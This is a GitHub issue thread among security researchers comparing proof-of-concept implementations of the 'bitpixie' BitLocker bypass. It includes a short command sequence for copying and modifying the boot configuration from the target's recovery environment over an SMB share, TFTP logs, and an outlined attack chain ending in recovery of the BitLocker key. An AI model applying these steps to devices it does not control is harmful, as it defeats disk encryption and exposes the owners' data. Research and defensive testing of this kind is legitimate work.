bitpixie icon indicating copy to clipboard operation
bitpixie copied to clipboard
verified publisher icon andigandhi

Alternative implementation, public source of Windows boot manager?

Open martanne opened this issue 10 months ago • 16 comments

Hi,

Great work, thanks for spending time on a public PoC.

I did the same last week when this repository was not yet in a working state.

Over time the repositories diverged completely, main differences seem to be:

  • I build the initramfs using a stripped down version of Frood, in the hope that this is a more "complete" system, possibly helping avoiding issues like #6.
  • The used Linux exploit tries to have the least amount of changes necessary.
  • You seem to want to construct the BCD using Linux tooling, what advantage do you see in this approach? My approach uses the native Windows bcdedit tooling which is part of the recovery environment.
  • I try to avoid committing BLOBs to the repo and instead download it from public sources. For example, it was not 100% clear to me which GRUB file from the Debian package you are actually using. Related, do you have a convenient public source for the Windows boot manager? I did not find it in Winbindex.

I have pushed my current code base to: https://github.com/martanne/bitpixie

So far I did try it on 1 laptop and it seemed to work. Would be interested in real-world experiences from others.

Hope it is useful for somebody out there.

martanne avatar Feb 03 '25 13:02 martanne

This exploit is in effect a new family. Many different exploitations are possible after abusing the BCD. Th0mas also stated that his approach lacked hindsight and was more of a "fix issues as they come". So using other initramfs could in fact even be better. If this could be merged is something the author has to decide.

The grub really doesnt matter... you can use any from Debian Buster to Bookworm.

Since winbindex removed all the old bootloaders I grabbed mine from an iso build with https://uupdump.net/

code1997 avatar Feb 03 '25 13:02 code1997

Nice! I'll take a look at it as soon as possible, however at the moment I'm a bit exhaused from all the initramfs-building and trial-and-error booting :D I like your approach, some thoughts about your points:

  • I tried to build a minimal initramfs as the booting times are sometimes very long so I wanted to get the image as small as possible; however as you mentioned, this might lead to various problems on different systems. I will try to test it on as many systems as possible.
  • I'm trying to construct the BCD file on the attacker machine mainly out of two reasons: I want to type as few characters on the target machine (no copy&paste and I'm a lazy guy) and I wanted to do some research just out of curiosity.
  • Sadly, the Bootloader isn't available on Winbindex anymore. Similar to @code1997 I dowloaded an old Windows ISO and extracted the bootloader (& compared the Hash with Winbindex ;) ).

andigandhi avatar Feb 03 '25 14:02 andigandhi

In principle I share your preference to avoid needless typing. However, in this particular case it does not seem that bad. The required commands are basically:

wpeutil initializenetwork
net use S: \\10.13.37.100\smb
cd %TEMP%
copy S:\create-bcd.bat .
.\create-bcd.bat
copy BCD_modded S:\BCD
exit

On the plus side the native tooling should always be compatible even if they for some reason decide to change the format etc.

Too bad about bootmgfw.efi I hoped for a more convenient option.

martanne avatar Feb 03 '25 15:02 martanne

On the plus side the native tooling should always be compatible even if they for some reason decide to change the format etc.

I completely agree that the Linux version is more prone to errors, but I think if the BCD format would change for some reason, the old Windows Boot Manager version would also not be able to read the new version.

andigandhi avatar Feb 03 '25 21:02 andigandhi

So far I did try it on 1 laptop and it seemed to work. Would be interested in real-world experiences from others.

I could successful use it on a Fujitsu Stylistic tablet computer. But have issues running it on a Microsoft Surface Pro 8, maybe Surfaces are better protected.

It seems that the Surface want's a lot more files:

dnsmasq: gestartet, Version 2.90, Cachegröße 150 dnsmasq: Übersetzungsoptionen: IPv6 GNU-getopt DBus no-UBus i18n IDN2 DHCP DHCPv6 no-Lua TFTP conntrack ipset nftset auth cryptohash DNSSEC loop-detect inotify dumpfile dnsmasq-dhcp: DHCP, IP range 10.13.37.100 -- 10.13.37.101, lease time 1h dnsmasq-tftp: TFTP Wurzel ist /home/xxx/bitpixie/PXE-Server
dnsmasq: lese /etc/resolv.conf dnsmasq: Benutze Namensserver 127.0.0.53#53 dnsmasq: read /etc/hosts - 8 names dnsmasq-dhcp: DHCPDISCOVER(enp8s0) 00:24:32:XX:XX:XX dnsmasq-dhcp: DHCPOFFER(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX dnsmasq-dhcp: DHCPREQUEST(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX dnsmasq-dhcp: DHCPACK(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX dnsmasq-tftp: error 8 User aborted the transfer received from 10.13.37.101 dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/bootmgfw.efi to 10.13.37.101 dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/bootmgfw.efi to 10.13.37.101 dnsmasq-tftp: error 0 TFTP Aborted received from 10.13.37.101 dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/Boot/BCD to 10.13.37.101 dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/Boot/BCD to 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/Policies/SbcpFlightToken.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SecureBootPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SkuSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/WinSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/ATPSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SkuSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/WinSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/ATPSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/SkuSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/WinSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/ATPSiPolicy.p7b not found for 10.13.37.101 dnsmasq-tftp: error 0 TFTP Aborted received from 10.13.37.101 dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/bootmgfw.efi to 10.13.37.101 dnsmasq-tftp: sent /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/bootmgfw.efi to 10.13.37.101 dnsmasq-tftp: file /home/xxx/bitpixie/PXE-Server/EFI/Microsoft/Boot/boot.stl not found for 10.13.37.101 dnsmasq-dhcp: DHCPINFORM(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX dnsmasq-dhcp: DHCPACK(enp8s0) 10.13.37.101 00:24:32:XX:XX:XX Surface

netaddict avatar Feb 03 '25 21:02 netaddict

@martanne German notebooks and recovery (that defaults to english) is a pain for us...

@netaddict the additional files do not matter... the problem is that the shim is not requested... Does the Surface display any errors? Did you check the bitlocker protectors as described in the prerequisites? Did you try manually building the BCD? We need more infos to investigate this

code1997 avatar Feb 03 '25 22:02 code1997

Be careful with the surface: By default it doesn't allow the "Microsoft Corporation UEFI CA 2011" Certificate which they use to sign 3rd party stuff such as shim loaders for linux.

BUT: If you enable it, you will change PCR7, even if you disable it again, you wont get back to the previous PCR7 value and lose access to your BitLocker key in TPM. If you want to bitpixie attack a surface, you need to build a WinPE and do the RAM Dump in there, as this is the only thing that boots on a surface device by default.

but it's actually weird: It doesn't show any load for the shim. Maybe, PXE checks the signature as soon as the PE header is complete and if it fails, it rejects the transfer. This would atleast explain the entries: dnsmasq-tftp: error 0 TFTP Aborted received from 10.13.37.101 Other entries state: dnsmasq-tftp: sent which indicates a complete file transfer, so we don't see the request because its aborted before the full file has been sent to the device. Wild assumptions... Maybe you just send it again the bootmgfw.efi as shim.efi just to check if it requests the file completely. a wireshark trace would also be very interesting here...

pascal-gujer avatar Feb 03 '25 22:02 pascal-gujer

@pascal-gujer that would have been my second hunch, but the request for the shim not showing in the log tripped me up. Thanks for pointing it out in detail! A wireshark dump would indeed be of interest here. And maybe we should start a section in the readme on how to troubleshoot / common issues.

code1997 avatar Feb 03 '25 22:02 code1997

Short update from my side: I successfully tested my repository on these devices after manually enabling the TCP stack in the UEFI settings:

  • Lenovo ThinkPad T460s 20FAA01100
  • Lenovo ThinkPad X280 20KES6C42B, this is a device provided by @pascal-gujer in his course last week

martanne avatar Feb 06 '25 10:02 martanne

@martanne Nice! Sorry, I did not find the time to test your exploit yet, I'll try to test it today after work on a Dell Notebook running Windows 11 24H2

andigandhi avatar Feb 06 '25 11:02 andigandhi

@martanne we completely reworked the build process of this repo and took some inspiration from yours :) Thanks for your work on this!

code1997 avatar Feb 18 '25 07:02 code1997

Hi, short status update from my side.

In order to also support machines which do not trust the Microsoft 3rd party certificate used to sign the Linux shim (as mentioned by @pascal-gujer above), I developed a WinPE-based approach:

  1. Provide a BCD with pxesoftreboot pointing to the same boot manager served under a different name, see create-bcd-winpe1.bat
  2. Switch out the served BCD to one pointing to a WinPE image with associated ramdisk from a Windows 11 installation ISO, see create-bcd-winpe2.bat
  3. Take a full memory dump using Magnet DumpIt for Windows
  4. Scan the memory dump for the VMK structures using a search-vmk.exe utility
  5. Use minimal Windows port of the dislocker-metadata utility to decrypt the human readable recovery password stored in the BitLocker meta data
  6. Unlock the disk using native tooling e.g. manage-bde.exe

This works in principle, but currently seems to be less reliable than the Linux-based exploitation approach.

Maybe the experts involved in this thread have ideas what the issue could be or how the reliability of the procedure could be improved?

See also my other comment for a possible debugging approach (maybe there are more efficient options?) and a screenshot of a successful execution.

martanne avatar Mar 18 '25 07:03 martanne

Hi, I saw your work yesterday - amazing! I have already built all the binaries and will try to run the exploit today as soon as I have a USB flash drive to hand :D

Is there a reason why you dump the full memory and then scan it? I did some small tests with a modified version of WinPmem-Scanner and had some very promising results. It uses a signed driver to scan the physical memory, the needle search algorithm can be easily implemented in the userland application.

andigandhi avatar Mar 18 '25 08:03 andigandhi

Looking forward to your experience.

No concrete reasons for the full dump. I agree that in principle an in-memory scan would be preferable.

I briefly looked at their README didn't see a mention of Windows 11, saw that they no longer distribute (newly?) signed drivers, thought cross-compilation might be difficult and then decided that for development a full dump might be handy for offline analysis.

But yes, it shouldn't be too difficult to integrate. Might give it a try later on ...

martanne avatar Mar 18 '25 11:03 martanne

With the latest commits of my repository a custom version of WinPmem is used. It just now worked on my test machine, but the sample size is 1. More testing would be welcome.

martanne avatar Mar 18 '25 20:03 martanne

Hey! for what it's worth, I finally made public my implementation, which I put together around the same time as you two @andigandhi and @martanne. It is also based on Thomas' article and is basically the same as you did, with the same kernel exploit (though I am thinking of trying out a different one to see how it goes, because that exploit was specifically made to be unstable to avoid malicious use). I have not had success on all the devices I've tested, so maybe we could work together to improve our success rate. Cheers!

https://github.com/garatc/DeviceDecryption

garatc avatar Jun 15 '25 18:06 garatc